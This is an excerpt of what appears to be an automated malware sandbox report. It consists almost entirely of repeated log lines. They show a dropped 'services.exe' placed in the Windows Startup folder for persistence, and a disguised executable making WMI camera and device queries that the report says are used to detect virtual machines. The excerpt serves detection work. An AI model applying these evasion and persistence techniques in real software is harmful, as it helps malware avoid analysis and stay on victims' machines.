                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
